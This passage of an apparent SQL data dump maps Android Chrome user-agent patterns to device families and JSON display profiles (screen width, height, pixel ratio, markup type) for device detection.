Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5606) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5633) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E5823) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E6533) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E6553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E6653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; E6782) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; EKO Novy G50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ELITE 5.0LW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ENERGY X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ERGO A500 Best) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ERGO A550 Maxx) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; EVOLVEO_StrongPhone_Q7_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Easy F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Elegance_5_0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Elegance_5_5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Elephone P8000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Elite 4.5M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Elite 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Elite Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Eluga_A2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; EverGlory II) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F-01H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F-02G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F1f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F1fw) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F1w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F5003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; F6003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FDR-A01w) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FEVER) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FREEDOM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FS402) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FS404) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FS405) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FS504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FS505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FS506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; FTJ152B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Force F500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Foxtrot) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Freedom Access) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Fun_S500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; G31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; G5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; G550KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GEM-701L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":480,\"screenHeight\":768,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GEM-702L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":480,\"screenHeight\":768,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GN5001S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GO984) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GS55-6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GS57-6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GSmart_Classic) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9295) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9301I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9507V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9515) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-I9515L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; GT-S7582) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; H1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; H2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; H60-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; H60-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HIGHWAY PURE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HIGHWAY STAR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HIMAX PURE 3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HM-N501-FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HP514Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HS-L695) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HT3 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HT3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HT6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HT7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HT7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 625) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 626) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 626s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 